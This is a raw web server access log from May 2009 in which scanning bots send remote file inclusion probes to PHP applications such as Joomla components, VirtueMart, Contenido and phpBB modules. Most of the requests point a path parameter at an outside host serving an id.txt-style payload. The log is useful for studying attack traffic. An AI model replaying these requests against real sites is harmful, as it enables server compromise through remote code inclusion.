211.241.40.51 - - [23/May/2009:00:53:43 -0400] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://208.98.22.241/id.txt??? HTTP/1.1" 404 257 "-" "libwww-perl/5.79"
62.140.23.192 - - [23/May/2009:00:54:40 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
62.140.23.192 - - [23/May/2009:00:54:40 -0400] "GET /logs/access_log.Q109051200///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
62.140.23.192 - - [23/May/2009:00:54:40 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
62.140.23.192 - - [23/May/2009:00:54:44 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
62.140.23.192 - - [23/May/2009:00:54:45 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
62.140.23.192 - - [23/May/2009:00:54:45 -0400] "GET /logs/access_log.Q109051200///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
66.249.72.114 - - [23/May/2009:00:55:04 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L208806444A51E50036BD080+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
209.59.12.99 - - [23/May/2009:00:55:45 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.249.72.114 - - [23/May/2009:00:56:21 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L20814D4816312700A17D04K+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
72.30.142.171 - - [23/May/2009:00:56:33 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+LAE54A21A0246F7008C2D08Z+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
218.52.34.165 - - [23/May/2009:00:56:59 -0400] "GET //include/mail.inc.php?skin_board_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
218.52.34.165 - - [23/May/2009:00:56:59 -0400] "GET /logs/access_log.Q108112300//include/mail.inc.php?skin_board_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
218.52.34.165 - - [23/May/2009:00:57:00 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
218.52.34.165 - - [23/May/2009:00:57:07 -0400] "GET /logs/access_log.Q108062200//include/mail.inc.php?skin_board_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
211.241.40.51 - - [23/May/2009:00:57:34 -0400] "GET /logs/access_log.Q108121400//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://208.98.22.241/id.txt??? HTTP/1.1" 404 279 "-" "libwww-perl/5.79"
64.202.102.41 - - [23/May/2009:00:58:02 -0400] "GET /logs/?sourcedir=http://www.van-long.de//components/com_joomlapack/.dat/fx29id.txt??? HTTP/1.1" 200 2490 "-" "Mozilla/5.0"
64.202.102.41 - - [23/May/2009:00:58:02 -0400] "GET /?sourcedir=http://www.van-long.de//components/com_joomlapack/.dat/fx29id.txt??? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
64.202.102.41 - - [23/May/2009:00:58:02 -0400] "GET /logs/access_log.Q108111500/?sourcedir=http://www.van-long.de//components/com_joomlapack/.dat/fx29id.txt??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
64.202.102.41 - - [23/May/2009:00:58:08 -0400] "GET /logs/access_log.Q108091100/?sourcedir=http://www.van-long.de//components/com_joomlapack/.dat/fx29id.txt??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
64.34.181.87 - - [23/May/2009:00:58:23 -0400] "GET /logs/access_log.Q109010400//oneadmin/calendar/samplecalendar.php?path[docroot]=http://www.maierarchitekten.de/manager/processors/r8? HTTP/1.1" 404 262 "-" "libwww-perl/5.803"
64.34.181.87 - - [23/May/2009:00:58:23 -0400] "GET /logs//oneadmin/calendar/samplecalendar.php?path[docroot]=http://www.maierarchitekten.de/manager/processors/r8? HTTP/1.1" 404 240 "-" "libwww-perl/5.803"
64.202.102.41 - - [23/May/2009:00:59:07 -0400] "GET /logs/access_log.Q108111500%20%20/?sourcedir=http://www.van-long.de//components/com_joomlapack/.dat/fx29id.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
64.202.102.41 - - [23/May/2009:00:59:08 -0400] "GET /logs/access_log.Q108091100%20%20/?sourcedir=http://www.van-long.de//components/com_joomlapack/.dat/fx29id.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
62.140.23.192 - - [23/May/2009:00:59:52 -0400] "GET /logs/access_log.Q109051200%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
212.150.52.114 - - [23/May/2009:01:00:02 -0400] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.jinyang-susan.co.kr/bbs/fx29id.txt? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
212.150.52.114 - - [23/May/2009:01:00:02 -0400] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.jinyang-susan.co.kr/bbs/fx29id.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
212.150.52.114 - - [23/May/2009:01:00:02 -0400] "GET /logs/access_log.Q108121400//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.jinyang-susan.co.kr/bbs/fx29id.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
212.150.52.114 - - [23/May/2009:01:00:06 -0400] "GET /logs/access_log.Q108072400//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.jinyang-susan.co.kr/bbs/fx29id.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
61.250.85.200 - - [23/May/2009:01:00:14 -0400] "GET /?sourcedir=http://www.van-long.de//components/com_joomlapack/.dat/fx29id.txt??? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
61.250.85.200 - - [23/May/2009:01:00:14 -0400] "GET /logs/access_log.Q108090500%20%20/?sourcedir=http://www.van-long.de//components/com_joomlapack/.dat/fx29id.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
61.250.85.200 - - [23/May/2009:01:00:14 -0400] "GET /logs/?sourcedir=http://www.van-long.de//components/com_joomlapack/.dat/fx29id.txt??? HTTP/1.1" 200 2490 "-" "Mozilla/5.0"
213.198.53.173 - - [23/May/2009:01:00:34 -0400] "GET /logs/errors.php?error=http://cafe9.fileave.com/ID1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
213.198.53.173 - - [23/May/2009:01:00:34 -0400] "GET /errors.php?error=http://cafe9.fileave.com/ID1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
213.198.53.173 - - [23/May/2009:01:00:34 -0400] "GET /logs/access_log.Q108072400/errors.php?error=http://cafe9.fileave.com/ID1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
213.198.53.173 - - [23/May/2009:01:00:34 -0400] "GET /logs/access_log.Q108121400/errors.php?error=http://cafe9.fileave.com/ID1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
72.30.142.171 - - [23/May/2009:01:00:35 -0400] "GET /images/_notes/nav_store_fav_off_r1_c3.jpg.mno HTTP/1.0" 200 210 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
61.250.85.200 - - [23/May/2009:01:00:40 -0400] "GET /logs/error_log.Q108090500%20%20/?sourcedir=http://www.van-long.de//components/com_joomlapack/.dat/fx29id.txt??? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
209.59.12.99 - - [23/May/2009:01:00:46 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
212.150.52.114 - - [23/May/2009:01:01:08 -0400] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.jinyang-susan.co.kr/bbs/fx29id.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
212.150.52.114 - - [23/May/2009:01:01:08 -0400] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.jinyang-susan.co.kr/bbs/fx29id.txt? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
212.150.52.114 - - [23/May/2009:01:01:08 -0400] "GET /logs/access_log.Q108121400//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.jinyang-susan.co.kr/bbs/fx29id.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
212.150.52.114 - - [23/May/2009:01:01:08 -0400] "GET /logs/access_log.Q108072400//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.jinyang-susan.co.kr/bbs/fx29id.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
61.250.85.200 - - [23/May/2009:01:01:28 -0400] "GET /logs/access_log.Q108111500/?sourcedir=http://www.van-long.de//components/com_joomlapack/.dat/fx29id.txt??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
61.250.85.200 - - [23/May/2009:01:01:32 -0400] "GET /logs/access_log.Q108091100/?sourcedir=http://www.van-long.de//components/com_joomlapack/.dat/fx29id.txt??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
64.34.181.87 - - [23/May/2009:01:01:37 -0400] "GET /logs/error_log.Q108101400//oneadmin/calendar/samplecalendar.php?path[docroot]=http://www.maierarchitekten.de/manager/processors/r8? HTTP/1.1" 404 261 "-" "libwww-perl/5.803"
62.140.23.192 - - [23/May/2009:01:01:51 -0400] "GET /logs/access_log.Q109051200%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
62.140.23.192 - - [23/May/2009:01:01:51 -0400] "GET /logs/error_log.Q109051300%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
220.181.7.97 - - [23/May/2009:01:02:30 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
212.150.52.114 - - [23/May/2009:01:02:35 -0400] "GET /logs/access_log.Q108121400%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.jinyang-susan.co.kr/bbs/fx29id.txt? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
85.92.68.111 - - [23/May/2009:01:02:37 -0400] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.fhbgc.org/Calendar/tools/fx29id1.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
85.92.68.111 - - [23/May/2009:01:02:37 -0400] "GET /logs/access_log.Q108091400//modules/vwar/admin/admin.php?vwar_root=http://www.fhbgc.org/Calendar/tools/fx29id1.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
85.92.68.111 - - [23/May/2009:01:02:37 -0400] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.fhbgc.org/Calendar/tools/fx29id1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
212.150.52.114 - - [23/May/2009:01:02:39 -0400] "GET /logs/access_log.Q108072400%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.jinyang-susan.co.kr/bbs/fx29id.txt? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
66.249.72.114 - - [23/May/2009:01:02:56 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L002981419EA096008C3C091+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
85.92.68.111 - - [23/May/2009:01:03:07 -0400] "GET /logs/access_log.Q109051000//modules/vwar/admin/admin.php?vwar_root=http://www.fhbgc.org/Calendar/tools/fx29id1.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
212.150.52.114 - - [23/May/2009:01:03:08 -0400] "GET /logs/access_log.Q108121400%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.jinyang-susan.co.kr/bbs/fx29id.txt? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
212.150.52.114 - - [23/May/2009:01:03:08 -0400] "GET /logs/access_log.Q108072400%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.jinyang-susan.co.kr/bbs/fx29id.txt? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
123.125.64.38 - - [23/May/2009:01:03:16 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
66.223.51.15 - - [23/May/2009:01:04:01 -0400] "GET /index.php?sourcedir=http://www.szolnokmegye.hu/plugins/p2000_sponsor_manager/fx29id.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
66.223.51.15 - - [23/May/2009:01:04:01 -0400] "GET /logs/index.php?sourcedir=http://www.szolnokmegye.hu/plugins/p2000_sponsor_manager/fx29id.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
66.223.51.15 - - [23/May/2009:01:04:02 -0400] "GET /logs/access_log.Q108111500/index.php?sourcedir=http://www.szolnokmegye.hu/plugins/p2000_sponsor_manager/fx29id.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
66.223.51.15 - - [23/May/2009:01:04:14 -0400] "GET /logs/access_log.Q108091100/index.php?sourcedir=http://www.szolnokmegye.hu/plugins/p2000_sponsor_manager/fx29id.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
62.140.23.192 - - [23/May/2009:01:04:17 -0400] "GET /logs/error_log.Q109051300%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
195.56.77.54 - - [23/May/2009:01:04:54 -0400] "GET /index.php?sourcedir=http://www.szolnokmegye.hu/plugins/p2000_sponsor_manager/fx29id.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
195.56.77.54 - - [23/May/2009:01:04:54 -0400] "GET /logs/index.php?sourcedir=http://www.szolnokmegye.hu/plugins/p2000_sponsor_manager/fx29id.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
195.56.77.54 - - [23/May/2009:01:04:54 -0400] "GET /logs/access_log.Q108111500/index.php?sourcedir=http://www.szolnokmegye.hu/plugins/p2000_sponsor_manager/fx29id.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
66.223.51.15 - - [23/May/2009:01:05:04 -0400] "GET /logs/access_log.Q108111500/index.php?sourcedir=http://minorblunders.com/orca.do?? HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
66.223.51.15 - - [23/May/2009:01:05:04 -0400] "GET /index.php?sourcedir=http://minorblunders.com/orca.do?? HTTP/1.1" 404 207 "-" "libwww-perl/5.79"
66.223.51.15 - - [23/May/2009:01:05:04 -0400] "GET /logs/index.php?sourcedir=http://minorblunders.com/orca.do?? HTTP/1.1" 404 212 "-" "libwww-perl/5.79"
195.56.77.54 - - [23/May/2009:01:05:04 -0400] "GET /logs/access_log.Q108091100/index.php?sourcedir=http://www.szolnokmegye.hu/plugins/p2000_sponsor_manager/fx29id.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
213.198.53.173 - - [23/May/2009:01:05:05 -0400] "GET /logs/access_log.Q108121400%20%20/errors.php?error=http://cafe9.fileave.com/ID1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
66.223.51.15 - - [23/May/2009:01:05:26 -0400] "GET /logs/access_log.Q108111500%20%20/index.php?sourcedir=http://www.szolnokmegye.hu/plugins/p2000_sponsor_manager/fx29id.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
66.223.51.15 - - [23/May/2009:01:05:33 -0400] "GET /logs/access_log.Q108091100%20%20/index.php?sourcedir=http://www.szolnokmegye.hu/plugins/p2000_sponsor_manager/fx29id.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
209.59.12.99 - - [23/May/2009:01:05:46 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.223.51.15 - - [23/May/2009:01:05:46 -0400] "GET /logs/access_log.Q108091100/index.php?sourcedir=http://minorblunders.com/orca.do?? HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
213.198.53.173 - - [23/May/2009:01:06:30 -0400] "GET /logs/access_log.Q108072400%20%20/errors.php?error=http://cafe9.fileave.com/ID1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
211.241.40.51 - - [23/May/2009:01:06:38 -0400] "GET //index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
211.241.40.51 - - [23/May/2009:01:06:38 -0400] "GET /logs/access_log.Q108091400%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 236 "-" "libwww-perl/5.79"
211.241.40.51 - - [23/May/2009:01:06:38 -0400] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 213 "-" "libwww-perl/5.79"
211.241.40.51 - - [23/May/2009:01:06:38 -0400] "GET /logs/access_log.Q108120400%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 236 "-" "libwww-perl/5.79"
61.81.17.221 - - [23/May/2009:01:06:44 -0400] "GET /logs/index.php?sourcedir=http://www.szolnokmegye.hu/plugins/p2000_sponsor_manager/fx29id.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
61.81.17.221 - - [23/May/2009:01:06:44 -0400] "GET /index.php?sourcedir=http://www.szolnokmegye.hu/plugins/p2000_sponsor_manager/fx29id.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
61.81.17.221 - - [23/May/2009:01:06:47 -0400] "GET /logs/access_log.Q108090500%20%20/index.php?sourcedir=http://www.szolnokmegye.hu/plugins/p2000_sponsor_manager/fx29id.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
81.2.227.113 - - [23/May/2009:01:07:04 -0400] "GET /logs/access_log.Q109051000/components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.graal-plus.zp.ua//images/pit-id.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.805"
81.2.227.113 - - [23/May/2009:01:07:04 -0400] "GET /components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.graal-plus.zp.ua//images/pit-id.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
81.2.227.113 - - [23/May/2009:01:07:04 -0400] "GET /logs/components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.graal-plus.zp.ua//images/pit-id.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.805"
66.223.51.15 - - [23/May/2009:01:07:35 -0400] "GET /index.php?sourcedir=http://minorblunders.com/orca.do?? HTTP/1.1" 404 207 "-" "libwww-perl/5.79"
81.2.227.113 - - [23/May/2009:01:07:49 -0400] "GET /logs/access_log.Q108123000//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.graal-plus.zp.ua//images/pit-id.txt?? HTTP/1.1" 404 269 "-" "libwww-perl/5.805"
81.2.227.113 - - [23/May/2009:01:07:49 -0400] "GET //modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.graal-plus.zp.ua//images/pit-id.txt?? HTTP/1.1" 404 242 "-" "libwww-perl/5.805"
81.2.227.113 - - [23/May/2009:01:07:49 -0400] "GET /logs//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.graal-plus.zp.ua//images/pit-id.txt?? HTTP/1.1" 404 247 "-" "libwww-perl/5.805"
85.92.68.111 - - [23/May/2009:01:08:06 -0400] "GET /logs/access_log.Q108111500%20%20//modules/vwar/admin/admin.php?vwar_root=http://www.fhbgc.org/Calendar/tools/fx29id1.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
87.230.85.142 - - [23/May/2009:01:08:58 -0400] "GET /errors.php?error=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
87.230.85.142 - - [23/May/2009:01:08:58 -0400] "GET /logs/errors.php?error=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
87.230.85.142 - - [23/May/2009:01:08:58 -0400] "GET /logs/access_log.Q108121900/errors.php?error=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
87.230.85.142 - - [23/May/2009:01:08:58 -0400] "GET /logs/access_log.Q109032000/errors.php?error=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
212.150.52.114 - - [23/May/2009:01:09:08 -0400] "GET /logs/access_log.Q108091400//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.jinyang-susan.co.kr/bbs/fx29id.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
61.81.17.221 - - [23/May/2009:01:10:39 -0400] "GET /logs/access_log.Q108111500/index.php?sourcedir=http://www.szolnokmegye.hu/plugins/p2000_sponsor_manager/fx29id.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
209.59.12.99 - - [23/May/2009:01:10:46 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
61.81.17.221 - - [23/May/2009:01:10:56 -0400] "GET /logs/access_log.Q108091100/index.php?sourcedir=http://www.szolnokmegye.hu/plugins/p2000_sponsor_manager/fx29id.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
216.151.134.36 - - [23/May/2009:01:11:42 -0400] "GET //?_zb_path=http://www.swedishlegion.se/poll/copyright.txt???? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
216.151.134.36 - - [23/May/2009:01:11:42 -0400] "GET /logs/access_log.Q109051100%20%20//?_zb_path=http://www.swedishlegion.se/poll/copyright.txt???? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
216.151.134.36 - - [23/May/2009:01:11:42 -0400] "GET /logs//?_zb_path=http://www.swedishlegion.se/poll/copyright.txt???? HTTP/1.1" 200 2495 "-" "Mozilla/5.0"
87.230.85.142 - - [23/May/2009:01:11:45 -0400] "GET /logs/access_log.Q109032000%20%20/errors.php?error=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
87.230.85.142 - - [23/May/2009:01:11:45 -0400] "GET /logs/access_log.Q108121900%20%20/errors.php?error=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
35.8.197.50 - - [23/May/2009:01:12:09 -0400] "GET /logs/access_log.Q109011600%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.gaylab.it/ray/copyright.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
35.8.197.50 - - [23/May/2009:01:12:09 -0400] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.gaylab.it/ray/copyright.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
35.8.197.50 - - [23/May/2009:01:12:09 -0400] "GET //assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.gaylab.it/ray/copyright.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
35.8.197.50 - - [23/May/2009:01:12:10 -0400] "GET //assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.gaylab.it/ray/copyright.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
35.8.197.50 - - [23/May/2009:01:12:10 -0400] "GET /logs/access_log.Q109011600%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.gaylab.it/ray/copyright.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
35.8.197.50 - - [23/May/2009:01:12:10 -0400] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.gaylab.it/ray/copyright.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
81.2.227.113 - - [23/May/2009:01:12:11 -0400] "GET /logs/access_log.Q109051200//include.php?path[docroot]=http://www.graal-plus.zp.ua//images/pit-id.txt?? HTTP/1.1" 404 237 "-" "libwww-perl/5.805"
81.2.227.113 - - [23/May/2009:01:12:11 -0400] "GET //include.php?path[docroot]=http://www.graal-plus.zp.ua//images/pit-id.txt?? HTTP/1.1" 404 210 "-" "libwww-perl/5.805"
81.2.227.113 - - [23/May/2009:01:12:13 -0400] "GET /logs//include.php?path[docroot]=http://www.graal-plus.zp.ua//images/pit-id.txt?? HTTP/1.1" 404 215 "-" "libwww-perl/5.805"
66.249.72.114 - - [23/May/2009:01:12:17 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L208806444A01250031BD080+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.175.122.228 - - [23/May/2009:01:12:25 -0400] "GET /logs/access_log.Q108051700%20%20/include/lib.inc.php?site_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
211.241.40.51 - - [23/May/2009:01:13:11 -0400] "GET /logs/access_log.Q108091400//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
66.175.122.228 - - [23/May/2009:01:13:18 -0400] "GET /logs/access_log.Q109051100%20%20/include/lib.inc.php?site_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
62.140.23.192 - - [23/May/2009:01:14:34 -0400] "GET /logs/access_log.Q109051000///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
62.140.23.192 - - [23/May/2009:01:14:39 -0400] "GET /logs/access_log.Q109051000///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
212.150.52.114 - - [23/May/2009:01:15:05 -0400] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.jinyang-susan.co.kr/bbs/fx29id.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
212.150.52.114 - - [23/May/2009:01:15:05 -0400] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.jinyang-susan.co.kr/bbs/fx29id.txt? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
212.150.52.114 - - [23/May/2009:01:15:05 -0400] "GET /logs/access_log.Q108110900//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.jinyang-susan.co.kr/bbs/fx29id.txt? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
212.150.52.114 - - [23/May/2009:01:15:14 -0400] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.jinyang-susan.co.kr/bbs/fx29id.txt? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
212.150.52.114 - - [23/May/2009:01:15:14 -0400] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.jinyang-susan.co.kr/bbs/fx29id.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
212.150.52.114 - - [23/May/2009:01:15:14 -0400] "GET /logs/access_log.Q108110900//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.jinyang-susan.co.kr/bbs/fx29id.txt? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
212.150.52.114 - - [23/May/2009:01:15:23 -0400] "GET /logs/access_log.Q108090100//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.jinyang-susan.co.kr/bbs/fx29id.txt? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
212.150.52.114 - - [23/May/2009:01:15:24 -0400] "GET /logs/access_log.Q108090100//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.jinyang-susan.co.kr/bbs/fx29id.txt? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
